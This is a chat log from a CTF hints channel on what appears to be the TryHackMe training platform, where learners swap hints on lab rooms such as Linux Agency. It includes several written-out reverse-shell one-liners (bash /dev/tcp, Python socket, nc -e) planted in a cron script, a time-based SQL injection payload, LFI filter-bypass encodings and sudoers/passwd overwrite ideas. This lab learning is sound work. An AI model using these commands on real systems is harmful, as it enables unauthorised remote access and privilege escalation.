#room-hints
It was until I backgrounded it then it backgrounded the whole console instead of the session as I understand it
Wow I am stupid.
I can try
But it should let you background smh
Yeah, it was a meterpreter, then you spawned a shell and it won't let you out
omg yes, exit worked
Thank you!
C:\Windows\system32>exit
exit
meterpreter >
there must be something wrong with my installation of Metasploit. Thanks both
I did nothing, I do not deserve any credit
listening and talking it through always helps regardless
Haha, yes it does. I am going to go update all my notes although.
@manic citrus Thanks again, got dalia's flag.
is there anyway to connect to linux agency priv esc users without starting again from scratch
because I did like 4-5 escalations
and then took a break
and I'd hate to do it all again
@obtuse birch Please do not post in multiple chats, that is spamming.
Nope
On the missionXX you can ssh back in as the initial user and then do "su - missionXX" with the last flag you got as the password
Penelope is the first direct ssh but you can su - straight back to viktor
notes as in, my methodology and the payloads?
Yes
Get into the habit of copy-pasting and screenshotting everything
(is apparently essential for oscp)
is it, wow, didn't know that. Thanks
Well if it's not documented, it didn't happen
touche
At least that's from what people who have done the oscp have said
are you planning on giving it?
Getting it assuming I can get work to let me take it
Might have to change jobs for that though :(
that always a bi... big trouble
any hint on linux agency root.txt
Escape the great blue whale
yeah i am trying it can't figure it out
Linpeas should spot it
And give a link to how to do it
Plus they made it easy to abuse
Look around for anything unusual
docker.sock??
That certainly should not be in a container
There's one more piece to the puzzle, good hunting
Naw that's a hint that you're in a container though
back again to get LA done
any hints on how to find the elastic volume in linuxagency?
damn, got LA all done
penultimate flag was easier than I expected... needed a hint on it though
docker escape?
||went too deep down the Docker route which wasn't needed until final flag||
Elastic volume?
I genuinely feel like Linux Agency is a room which deserves a badge reward
I don't know...that room annoyed me a lot...
i agree
Some bits were a bit repetitive in the first part
sure
the second part is fun
@ripe hedge yes task3 flag 12
The privesc vectors were fine, could have removed a couple of the gtfobins
Felt like there was a bit too much filler imo
good for beginner imo
Anyone Completed Linux Agency..
I'm stuck at mission 17 flag...
The hint is "SOS! Somebody kidnapped the elves of santa"
Pls give any hint
Thank you
I'm stuck at mission 11 flag...
The hint is "Your need to finD some way to reverse a binary tree."
Pls give any hint
i am just beginner
Stuck at silvio's flag, i found a way to execute privesc using zip binary but its not working. Any help?
I copy-pasted and it worked...
Make sure you're running it with that user
I'm sorry but how?
Sudo -u usually
Yup
@ripe hedge how can i decode basically it is a directory
haha ,complete the Linux Agency, feel fun.....
Maybe you're not doing the privesc correctly
hint fin ""D"" look in the man page of find
im stuck at flag25 dont understand the hint
the binary checks a condition, find it
Hi any hints for penelope's flag in Linux Agency room ? ||Is it some base64 encoded file somewhere in /var ?||
still i am stuck
Try ||grepping recursively ||
thanks for help @digital bolt @ripe hedge @pure thistle
Did you get Penelope's password?
it's near sean's
Nopes
OK, you need to go back to where you got Sean's and look.
how can i escalate to root in "injection" pls?
What have you tried?
I'm guessing you are on the last task right? "Get the flag!"
sudo -l ,SUID and crontab
yup true
Get a reverse shell & netcat running. Go from there
Hint says "There's no user to privesc to so where could the flag be..."
Find
@winged mist i found it, but isn't that considered cheating
like you are looking for a file called flag just cuz you know it's there
in a real world scenario we won't know if there's a file called flag
do you understand what i mean?
what if the file was called anything else flag
we would never find it
what i mean is using find command to search for flags is not fair
what if we didn't know the name and we need it how are we supposed to find it?
You should know what exactly you are looking for before starting
but it's always called either flag.txt or user/root.txt so it would be easy using this method
i can do (grep -R "THM{") for half of the rooms and it'll work
Not exactly kek. Irl is somewhat different from ctfs
anyone on linux agency ?
where are you stuck?
Bet a bunch. But I haven't finished it yet
So I might not be able to help sorry
Better just ask
& have patience
@winged mist thx for the help
You could ask this in #general & get more insight
No p
Task 13 says what option you should use when the host doesn't reply ping.
I have completed it
I don't get ping reply....
And if you think nmap says "Host is up" == "exists ping reply", it's wrong. Nmap's host discovery does not only ping(ICMP ECHO_REQUEST), but does more things.
Im doing linux agency trying to get dalia's flag. I dont know what im doing wrong:
- ||Crontab says Dalia executes /opt/scripts/47.sh||
- ||I edit the script to do reverse shell using bash -c 'exec bash -i &>/dev/tcp/$RHOST/$RPORT <&1'||
- ||The revshell does not execute and cronjob overwrites the script again||
Ye I eventually figured it out, I was using wrong flag. I am a dummy
Thanks got it
|| bash -c ' bash -i &> /dev/tcp/$RHOST/$RPORT 0>&1'||
Bro I was stupid, it was so silly and easy answer, I found the flag instantly when I opened my laptop today.
Apparently there is nothing you can do when the brain freeze...
Anyway thanks for the help.
it worked, thanks!
Breaks are important ;)
Having some trouble with Printer Hacking
How would I connect to a printer with a non-default port?
Don't know if I'm doing anything wrong or what
I'm in the linux fundamentals 3 room on task 7 - I've found the binary - the test directory and file already seemed to be in my home directory but whenever I run the binary it just prints out test1234 which isn't the correct answer it would seem
ugggg having trouble with escaping a docker container
Anyone give me a little hint on getting started with keldagrim... I'm completely stumped
No hints for 72 hours after release
It hasn't been 72 hours yet, please wait 72 hours after release before asking for help/hints on rooms
Which room?
wondering if someone can help me please on the Linux fundamentals 2 task 11 This challenge is pretty simple. The binary is checking to see if the environment variable "test1234" exists, and if it's set equal to the current $USER environment variable.
then it asks for shiba3 password
Cancel found out thanks.
Working on the room "John". Openwall's site is down, which has the answer to task 8 Q2. "What rule would we use to add all capital letters to the end of the word?" Can anyone help me with the syntax?
Openwall seems up
shoot. must be my firewall blocking it then. Thanks!
linux Agency
linpeas might help
hummm ok i don't understand how will linpeas help with the commands to break out of a docker container?
yeah sorry that makes no sense to me
Finally after like 8hrs finished LinuxAgency root.txt was brutal
can anyone help me with mission16 flag, i found the file but i cant figure out what type of encoding it is
linuxagency
i found out, but can anyone help me understand how to identify hashes by seeing them ? or is there a tool or something online( i try to use burp or crackstation)
Hashid
gotcha
thank you for this one, i prefer using online crackers over stuff i need to install.
any hint on Madeye's Castle user1.txt
!rule 13
Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.
Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.
Gotta wait 72 hours
i cant understand the hint on mission24 "send the money to another country" ?
Don't pay too much attention to the clues, just enumerate like you are doing a priv esc
coolio
Hello!
Do you have any idea how to transfer files faster from my computer to the attack machine? (I mean, the files that I downloaded from the website)
I'm using a http server for the moment, but it's a bit tricky and I'm searching for a better solution.
Thank you!
Doing the linux fundamentals 3 room - the binary is meant to look if there is a file in the home/test directory which there is but every time I run the binary it prints out test1234 and this isn't the flag
What should I put on the owner? https://cdn.voidchan.gg/u/vCD5sPr.png
You have not run the binary in that screenshot.
Not only that but I do not see the binary in that screenshot.
Sorry was in a separate directory - marked as spoiler as finding it is part of the task
nvm I misunderstood the question
You're entering the flag wrong @white salmon
Does the binary need to be in the same directory?
I just misunderstood the question
It's fine now
Sorry meant to reply to @trim haven there
Oh
can I get a sanity check for the bruteforcing part of Madeye's castle, or is it too early?
too early, only just released I believe
only released yesterday
another ~48 hours to go
Yeah, I think I have a few ideas, but all of them involve bruteforcing which I really don't want to resort to
also, they spelt Hermione's name wrong and I don't know if it was a continued error, or just a typo - which kinda screws with my whole bruteforcing thing
u got it ?
cuz i think i got something
anyone onto keldagrim?
@true orchid scp can transfer files between computers
don't think we're allowed to give hints on keldagrim either as it's pretty recent
got anything?
check hosts
have you found login page?
yes
have you found notes?
alright
not really in regards to that previous comment
alright
Best hint I can give is not to get too distracted by the hint! There's something else you can look at to see what the folder owner has been up to.
just rooted keldagrim, really nice machine, kudos to @dusky vigil
ayy nice, good job
naw not yet
can i dm
Do scp
I get nulls ><
Just rooted Madeyes Castle. It was very pleasant journey to root
@astral raptor yep
@astral raptor I can't no hints for 72 hours
Try Harder
Yeah buddy
I tried some and got result
Maybe luc***** has to do something with something but i don't know what is that something
Please stop spoiling the box.
may be we don't have write access here
have you tried doing as the line that says: consider using PASV?
it can also be name or folder constraints, you may have write but not on that particular folder
instead of you saying "send me data on this port" (active) it waits for the server to say "you can send data on this port" (passive)
if I understood correctly
it's who initiates the transfer
PASV mode is generally used to bypass firewalls
^ yup that is correct, apologies for the delayed response, i was in a meeting 
Who have done Madeye's Castle? I need help
!rule 13
Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.
Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.
@white salmon not yet
Okay
hello is there any admin for Madeye's Castle
Why do you need an admin?
Please do not ping the administrators.
ok sorry
Also no hints for that box for at least 2 more days
could I get a hint on linux agency -> mission12? I got no clue what the hint's talking about, and I didn't seem to find anything useful
nvm, got it
hey guys can anyone help me with madeye's castle box?
Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.
Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.
sorry didnt know the box is so recent
has anyone encountered problems while ||decrypting the .pgp file|| on tomghost? I keep getting the ||gpg: decryption failed: secret key not available|| error
Did you import the secret key?
I have not, but I already cracked the other file. I'll research on that then thanks
ahhhh that's what I was supposed to do. got root, thanks again
im on internal room,i have admin access on wordpress,but i cant install any plugins because of file writable rules 'An unexpected error occurred. Something may be wrong with WordPress.org or this server's configuration. If you continue to have problems, please try the support forums.' how can i upload my reverse shell? hint plz
maybe you can change an existing template and run it? for an example the 404 file.
yes,got it 1min ago,ty
guys i'm doing the "chill hack" room and i'm in as the user apaar
i'm trying to escalate to root but idk how
i tried crontab, SUID and sudo -l nothing helps
how can i do that?
u got to steghide 1 picture
Hi Guys, I would really appreciate a hint on Linux Agency. I am at the final steps, looking for user.txt. I actually have no clues. Tried to run Linpeas but I can't get anything useful from it. Many thanks
Check hint with ur programmer mind
You should exploit ||sudo vulnerability||
Thank you guys, I'll work on that

Hi. I am stuck on the Nmap room (tryhackme.com/room/furthernmap) task 3 (Switches) question "How would you tell nmap to scan all port?". Can anyone give me a hint to the question? I looked through nmap -h but can't find anything useful, I used grep but still can't find anything useful.
thank you. I appreciate it.
@leaden walrus use manual for nmap u have there much more information than on nmap -h
command: man nmap
Concerning the OWASP-Juice-shop room in the beginner's learning path. I'm at task 4 where I'm using burp suite to brute force the admin's password and it has taken over 3 hours and hasn't finished yet. Is this normal? Or am I doing something wrong?
Something's gone wrong. You'll have to give us a clue though.
I mean also burp intruder is slow without burp pro
hydra is much faster
Should intercept be on or off or that doesn't matter? I've been doing it with intercept off because I've had to keep extending the time
True
Try zap
but keldagrim was announced on 29th of january
it was 4 days ago
72/24 = 3 days
@stuck fractal
Ok
No, you can't

-_-
Hi everyone i am currently in the burp suite room at task 10. I have already found a response with a set-cookie header and send it to the sequencer when i run the sequencer i just accumulate requests but no tokens. What am i doing wrong. Ps: i also waited longer ~ 1 million requests
any hints for Keldagrim?
#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:
- What room you are on
- At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
- What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done
is that message pinned, @trim haven it should be otherwise
true
So I copy and paste
I'm sorry
Not your fault 🤷‍♂️
Rule 13 perfectly states that if they need help and do not specify it correctly, they can be denied help
yeah but I'm still sorry you have to keep copy-pasting
Please include the room, task, and question number in your question if possible.
Oh, it's no bother.
Easy guys I am new kid in the block. Didn't see pinned messages , will check now..
Should i post that in room-help ?
I didn't use thm discord a lot, always try more and more until I got root access..but with keldagrim i stuck with foothold, tried nmap, gobuster, nikto, web site source code searching...but no clue at all for me..did not try with msf yet..
nmap should give a hint
let me check my notes
yeah nmap should be able to tell you what kind of server this is
gobuster should be able to find some juicy things as well
or in this case the page source
the rest is mostly looking around
which wordlist did you use for gobuster? only found admin page
will follow that hints
admin page sounds interesting, no?
at the first check didn't see anything interesting will check once more :)
there are two ways to get interesting things
but I'd google the type of server if you aren't familiar with it
guys any hints on how can i escalate to root in "start up"?
linpeas
it doesn't help
the escalate has something with file permission and where can i write to
uh right, you wanna pm so you don't spoil anything?
Then check the file and see what it does
can i pm u?
sure
you know using grep with a tag can do pretty much every challenge in linuxagency
did some challenges with that, and 100% sure that was not the intended way
regex :)
read the walkthrough, he has used kinda same thing. But still 100% sure that is not the intended way
there are often unintentional methods in a room, the linuxagency is focused on sharpening your skills with the linux cli
i want to learn that intended purpose
1st look for locksmith blogs on getting into cars. It's something you'd put into the gap by the door & inflate so as not to damage anything. 2nd it's in the 1st video. If you didn't catch the term, it's on Deviant's web page. The last is a bit weird. It's not really the name of a thing, more the activity. Like something that blocks is blocking. In this case the word before-ing is something you might use to protect yourself if you wear armour or are Captain America.
@candid nimbus in English, it's also a thing, but it's a strange grammatical quirk
you'd use it to protect cables from interference as well
I know. I've spoken it for 50 years and have an MA in it. I'm just helping the bod to the answer without getting excited about gerunds.
hi there
ahm a simple question if you dont mind
as i know answer supposed to be something like
--bypass firewall
--Stealth Scan
seems they are not correct , any body can help with that?
The first one is correct but needs to be worded differently
oh....okay thanks now i have a clue about it
it should be in the task, word for word
hello, i am doing the Bounty Hacker room. .com/room/cowboyhacker
if i use "locate user.txt" it works but it does not work with "locate root.txt"
also when i use "grep "THM" *.txt" it only shows me the user.txt
does someone know why cant find the root.txt?
Are you root?
Then you can't list /root usually
you don't have execute/list rights on the directory
damn, nvm. thx guys
Could anyone pm for a nudge on 'Relevant'?
sure
guys can i have a hint for wgel ctf
im really stuck
im in as jessie but i can't escalate to root although i can run wget as sudo
but i don't know how to take advantage of that
i thought of downloading the shadow file and cracking the hashes but the passwords are not in the rockyou list
on linux agency, final task, need some assistance finding sean's flag. i know im in ||adm|| group but i have tried to grep recursively in ||/var/log|| but couldnt find anything. any help? thanks
You're in the right direction it is in || /var/log ||
@sonic wigeon is it within one of the directories within ||/var/log|| i've parsed through what seems like every log file and cant seem to find anything that has to do with sean. some files are also huge which doesn't help
Are you looking for the flag recursively in the right format for sean ?
Np
hey i need a kick in the right direction for a linux privesc, so i found a script which is executed by a non root user as a cronjob, which i have the write permission to. i cant think of anything other than putting something like this "bash -i >& /dev/tcp/10.0.0.1/8080 0>&1"
this is the first time im coming across a privesc like this!
You can simply put /bin/bash to get a shell
No hints or helps are allowed for new rooms till 72 hours passes.
Morning everyone. I did Ra2 and Set. Apparently, Osiris seems the hardest one. Any nudge on Ducky payload via TFTP. I tried to submit simple .bin payload to ping me back but to no avail. Definitely, I do something wrongly. Can anyone DM me with some nudges to put me on the right track, please?
can you use wget to put a file where you shouldnt? ie. instead of reading a file writing a file
yes
i tried to download the /etc/sudoers and then edit it on my machine so i can run more commands as root but when i replace it with the original /etc/sudoers everything breaks and i can't see the output of sudo -l
with wget remember -o != -O
i also tried to download /etc/passwd so i can edit it and put a user there with a uid 0
but when i type su (user) it also breaks
i used -O
shadow?
.ssh
i think -x -nH
I have a config file which consists of list of URIs I want to download. For example,
http://xyz.abc.com/Dir1/Dir3/sds.exe
http://xyz.abc.com/Dir2/Dir4/jhjs.exe
http://xyz.abc.com/Dir1/itr.ex...
New room I think?
yup
Hey guys,
I'm trying to do this room : https://tryhackme.com/room/brainstorm
I'm stuck on launching the exe inside a windows 7 32 bit M (with immunity debugger installed), for those who have done this, what was your install ?
thanks for your help
This program cannot be run in DOS mode, I tried to search online but can't get what I'm doing wrong (tried with windows 10, windows 7)
Yes
okay thanx
Can anyone help me in madeye's castle
K
Hi anyone working on NIC -Linux Part 1? I stuck for long this one. the shiba3 password and shiba4 password..... any guide of hint would be appreciated
Check the linux rooms
I forgot that the linux rooms were updated so that content needs to be refreshed in regards to the room pointer
Ok i got it done. i did not know it has nothing to do with the ROOM for that two questions
thanks for the room. Great one
It's alright haha, it used to be 1 single box rather than 3 separate ones and thank you for your feedback ❤️
it should be in the users folder, you could also check for the file name
How could we insert a new value called toyota to replace tesla?
i know how to do it, but not getting the answer right
could someone help
may i dm you @tulip mural
Sure
You need to change the 'syntax' without changing the "semantics"
i was doing linux agency when i reached mission 9 i got rockyou.txt in the directory of mission9 i tried locating flag.txt its there but when i tried opening it outputs permission denied
Just try to grep mission10
what can you explain a lil bit more please
Use cat command by piping grep command
can you give a example
example
Anyone playing archangel ctf?
my brain is dead and cant think what to do
!rule 13
Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.
Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.
@white salmon @tranquil ivy ^
Thanks James.
As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.
alright thanks
Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.
Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.
alright, sorry for asking but i have only now checked that it was released today
i usually open the machines in the new rooms section without looking up at the announcements page, i'll keep that in mind for the future releases
thanks for let me know that
eh?
got a question about the nmap room.
the last question says "deploy the ftp-anon script against the box"
unfortunately no matter how many times i run the script [nmap -vv --script ftp-anon -p 21 <ip address>]
i keep getting a response saying the Host seems down, if it is really up, but blocking our ping probes, try -Pn
am i doing something wrong?
can someone point me in the right direction?
is the task bugged?
Oh!
nvm
finally started working
looks like something was wrong with the room
Guys any hints on Keldagrim room ?
#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:
- What room you are on
- At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
- What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done
Im basically stuck in the exploitation phase
so Im in the network services room, i've done everything right so far with the exception of.... I have no idea how to read a txt file in samba. Everything I try turns up nothing, either i get an object name not found or a failed to open message
It has spaces in the file name
Try quote marks or escaping the spaces
didnt work
underscores are their own character
kk
They're not spaces
hmmm, now i get a response that says for read/write fnum 4
Just use get.
is there a manual i can read or should have read before tackling this?
it works just like the command line ftp client
omg, ty! i didnt think i'd actually have to download the file
Madeye Castle
Need a little hint on linux agency, managed to get || robert's passphrase || but im unsure what to do now, doesn't seem to be an account
Check for listening ports
I have a problem in attacking kerberos room, in task 2, enumeration w/ kerbrute, I added CONTROLLER.local to my /etc/hosts file, then I execute the command ./kerbrute userenum --dc CONTROLLER.local -d CONTROLLER.local User.txt but it isnt finding nothing, Ideas?
nvm I forgot to get raw input from Users.txt when I wget the list
Enumerating Telnet in the Network Service room - can anyone share how you'd know that Telnet is the service being used? It doesn't indicate it in the scan from what I can tell
from what I can remember its a backdoor you just use telnet to connect to this backdoor
or something like that not sure
Check what services are running on the machine
Not all services are exposed to the outside world. Look at the type of credentials you got, surely they'll be useful somewhere
hey , I am doing advent of cyber 1 Day 23 is related to sql injection and for that I used sqlmap , this is the payload of sqlmap , ||log_email=gyQB' AND (SELECT 2288 FROM (SELECT(SLEEP(5)))YfXe) AND 'qvoO'='qvoO|| but when I tried injecting it through the login page , I was still getting the error related to some email check , why ?
hello ,how bypass strpos($path,'../..')?
%2e%e%2f%2e%2e is not work
%252e%252e%252f%252e%252e is not work too
!rule 13
no help for new rooms yet
!rule 13
@chilly wigeon I'm also struggling with that, we will have to wait until saturday evening for hints
haha .i will go ,bypass it~!~!~!~!
I hate you @chilly wigeon
I'm sure you can progress fine on your own before then!
archangel, more rickrolling than flags. fun box
yeah a few hidden gems
I already gave up, I tried literally dozens of things to bypass the lfi filter, I probably missing something obvious/simple/stupid , maybe tomorrow with a clean mindset...
bypass is actually very simple. For me the next step is much more annoying (it is so simple, yet I cant seem to find the right file)
Amazing how many problems get solved away from the screen!
Hello everyone, I am doing Archangel, I don't know how to view the code. You can help me. Thank you.
U need to wait 72hrs after release for hints. This will be on Saturday as the room was released yesterday.
okay
same I view the code but that doesn't help me much haha
Yeah understood already! I just like to discuss woes and not feel alone - I'd already kinda discovered stuff through trial and error so for me it wasn't as helpful
shhhh
ok i got it now, time away really does help
any hint on madeye's castle user1.txt
is Madeye's open?
wdym
are we allows to give hints
yeah i guess
in any case, tell us where you're at, and what you've tried
got the spellnames.txt try to login in the .thm site
hello i am on linux agency mission12 i got in the mission11 dir got some dir named share > nano found nothing in those i want the flag of mission 12 hint says its time to study EVS i dont what that is
EVs (Environment Variables)
yeah the hint is a bit misleading
Let me change the hint.
there's no brute force involved on the login page
ok
(you'll need to hang on to that list though)
The hint now says EVs.
not my place to say, but maybe check with the room creators?
thanks sir
i would be glad if you can tell me where to study those i didn't found any great site by googling
2:58 PM] timtaylor: EVs (Environment Variables)
got the flag thanks for your help
haha yes
i was studying but just for curiosity whats the difference between EVs and normal variables
what do you mean by normal variables
they are set up to store arbitrary information
for convenience
I mean in what sense
variable in linux
environment variables are just variables in the environment you're in as the name
like with bash, if you do VAR = value then you're basically setting up an environment variable
its same as normal variable
there are some that are set by system that will be in every environment like $PATH
pretty much
there's a way to set some permanently but can't remember what file it is.
ohh so they are already set up by system thanks
Also research the difference between global and non-global. 🥳
sure
I was solving linux agency room... N I got stuck in escaping the docker container... It isn't mounting
look around the web for different methods I don't think I had to mount anything
Srsly?? There is another way to esc it?
unless I am completely wrong and being smooth brain
I literally got the whole way all without hints... Now stuck here for hours
Hmm well can u be a little more specific what u tried?
Can I dm u?? I don't wanna spoil the challenge for others
let me check if i noted it down or not
I was following a blog... And then tried using the
mount /dev/sda1 /mnt/root
Has anyone completed Archangel? I have been stuck on the Flag2 part for hours now. Have tried a ton but can only ever get the normal text from the page output or "Sorry, thats not allowed"
No hints allowed yet on that room.
Alrighty. Thanks. Will go back and start from square one. I have to be missing something easy.
What am i doing wrong?
still in the network services room, attempting telnet exploitation. why can't i generate the payload using msfvenom?
is there a fault with the command i'm using?
your command looks alright, is that ip that you assigned to lhost, your machine's ip or the box's?
I wrote exactly the same command, and it worked
thats the IP of the attack box
shits happens
damn, what a diff swapping numbers makes
ty for pointing that out
woulda prob been another 30 mins before i noticed it
72h has not passed yet. So no hints yet
Oh I see...
Do not post spoilers, especially when 72 hrs hasn't passed since release.
Oops, my bad man, didn't know about this rule, good to know!
Sorry about that
Can anyone give a nudge on Linux Agency mission25 flag....
i got the binary check all the files in the mission24 directory......am i supposed to do some reverse engineering on that binary
the binary is a rabbit hole, try looking elsewhere in the folder
@prisma gull and @glacial gust For Agency Mission 24, I'm pretty sure the ||binary|| is not a rabbit hole. I had to use it to solve...
so i have to do some reverse engineering on that binary
Yes. I did.
Do not provide or ask for help or hints for Archangel room until 6th Feb, 7pm (GMT)
@glacial gust I checked all the other files in that directory but nothing showed up
if you look at the hint, it references money transfers, if you do some word play with a money transfer app and a file in the directory you should be able to locate the flag
can I DM you
Feel free to DM me, if you'd like as well.
On the Nmap room (https://tryhackme.com/room/furthernmap) in the practical elements - my scans are taking ages - like 15 mins - I've had to add the -Pn option as it was saying all the ports were closed otherwise - just not sure if I have missed something
well done.. archangel...
Can I get a hint for the nmap room
question: ||
How would you perform a ping sweep on the 172.16.x.x network (Netmask: 255.255.0.0) using Nmap? (CIDR notation)||
current answer:
||nmap -sn 172.16.x.x/16||
x is used as a placeholder in the question
It's a common placeholder generally
But 172.16.x.x implies a /16
As does the netmask
so that part is fine
hello i am on linux agency mission25 i cant use ls -l mission25@linuxagency:~$ ls -l
output bash: ls: No such file or directory
can i get a hint
@distant tartan see path
the output says that ls does not exist.. is this possible?
Variable
no
echo $PATH @distant tartan
yes
thanks bro
if not worked try this
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
Close the shell and open a new one maybe?
/bin was enough
Restoring path is the only way ig
it worked

actually restoring path was only the task
guys i'm doing the linux agency room
i did it before and i reached to the user reza and now i'm trying to do it again
but the thing is i'm in as the user viktor and i know in order to escalate to dalia i need to give myself a shell using the 47.sh file
i tried
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
nc -e /bin/sh 10.0.0.1 1234
but none worked
before the bash one worked with me
what's wrong now?
Room: network services
Task 10: Exploiting FTP
Using hydra to generate possible passwords, I see it puts forward 14 million possibilities. Am I seriously expected to sit here while it tries all of these? does it actually try them and return a value when one works or am i supposed to be doing something else?
@opal vine is that your correct IP?
it actually does
you can try the -V for verbose
yup im pretty sure
10.0.0.1 is not your tun0 ip
you dont need to wait for all the passwords to be tested, the file has 14 million entries, but the password will probably be in the first few thousands
I did, its showing me a ton of results but so far the end of the line for all of them says 0/0
For THM, brute force should take no longer than 5 minutes
omg! first few thousand?! lol
You'll have to modify them
its only on 800+
its diff ip
try to use your ip (tun0)
yes right
Should work
it's not
i know that there's an interval where the root re-set everything
if didnt then try it again cuz it changes after 30 sec
but i did it 45645 times
what is your listener command ?
You have 30 seconds to set the file, 30 seconds after its run, it will be reset
the way you wrote that rev shell the listener command should be nc -lnvp 8080
I used watch to see when the reset occurred
ok this worked, i think it was a typo idk
thanks for the help @ripe hedge @kind bear
anytime 
Good hunting
trying to complete the nmap room. stuck on this question
Perform an Xmas scan on the first 999 ports of the target -- how many ports are shown to be open or filtered?
Currently using this command and getting this response
||```
$ sudo nmap -sX -p1-999 10.10.84.131
Starting Nmap 7.60 ( https://nmap.org ) at 2021-02-04 15:02 EST
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.12 seconds
```||
When I run -Pn to check I get told otherwise though
||```
$ nmap -Pn 10.10.84.131
Starting Nmap 7.60 ( https://nmap.org ) at 2021-02-04 15:00 EST
Nmap scan report for 10.10.84.131
Host is up (0.16s latency).
Not shown: 995 filtered ports
PORT STATE SERVICE
21/tcp open ftp
53/tcp open domain
80/tcp open http
135/tcp open msrpc
3389/tcp open ms-wbt-server
Nmap done: 1 IP address (1 host up) scanned in 10.35 seconds
```||
the xmas and port range correct?
You want an xmas scan. That skips the ping. And scans the specific port range.
All three flags.
Would that cause the host to show as down?
Would what?
the missing flag. when I try to xmas scan i'm told the host is down. when i use -Pn i'm told the host is online. i'll try to go back over the coursework
Just ask your question
Linuxacademy
You mean linux agency?
So flag 25 ||you're not able to cat anything, right?||
No
There is only .viminfo file to cat
And bribe file is asking for money but where to insert
I tried vim bribe
Asking for a command in it
@astral smelt any lead..?
Ah sorry thought you was on the next one try the ||export command||
So did you cat the .viminfo file?
It's not that big. If I'm remembering right it might be worth a browse
@simple mountain Hey guy, can you give me a hint on this question? I keep typing FTP as the service but telling me it's incorrect ?
Where are we at?
not seeing your port numbers on that
The answer to that question is giving three asterisks, so i'm assuming it's FTP but that seems to not be the correct answer
How did you discover this?
sorry
Dammit deja lol
So bottom line, this took creative thinking
for the answer
Ok... roki - run it anyway.
Thanks you guys lol
Yeah. So 1 question was 'How many services on ports under 1000'. And the next question asked for the higher port.. and you made an assumption
Guys any hints on Keldagrim room ?
has anyone finished with Intro to x86-64 room? I'm stuck on CRACKME1 don't know exactly how to do it
any
Is anyone else having issues with the sysinternals room not loading the live packages ?
guys i'm doing linux agency , i reached to the user sean
but i can't find his flag , like is this normal?
ya, ask a question you want a hint on
Just be patient and wait?
wait for what
Someone who's completed the room and wants to give you a hint
oh ok
@opal vine what user are you currently logged in as?
If you are currently sean, grep and certain logs are your friends
!rule 13
Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.
Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.
hello i am doing linux agency how to extract a flag from flag.mp3.mp4.exe.elf.tar.php.ipynb.py.rb.html.css.zip.gz.jpg.png.gz
This is the room hints channel. @tulip bronze
fair
Maybe determine the actual file type.
how to do that can i find it on google
sure
Practically all information can be found on google
file etc is it this just making sure
Try it and find out
Research the command if you don't think it is right
No reason to ask me when you could find out faster yourself and learn something in the process
ok
lol at least 1 rickroll(s) in archangel
@novel sparrow Let's just not
ok
file -i file name worked gave me file type as g-zip and charset as binary
yes now i have to decompress it thanks for the hint
thanks i got the flag
hi, can someone help me understand this syntax? "-perm -perm -u=s"
i know it selects the SUID bit, but i dont quite understand the -u= part
are you talking about the find command?
aye
also is this a room specific task or more 'infosec general' (just to make sure correct discussion right place etc)
well, i'm working on the find room
and im just looking to understand the syntax a little more clearly
well there is a section in the manual on find with permissions and it talks about symbolic user id representation in some examples
'man find' should bring it up
yeah, i've read through the majority
perhaps i'm a little dense, but it seems ambiguous
so files that user has setuid for u=s
Look at his groups, figure out what that means
can anybody help me out with Cyborg having trouble getting ||borg|| to run
Sure, @pure thistle. What do you have so far? Feel free to DM, if you'd like.
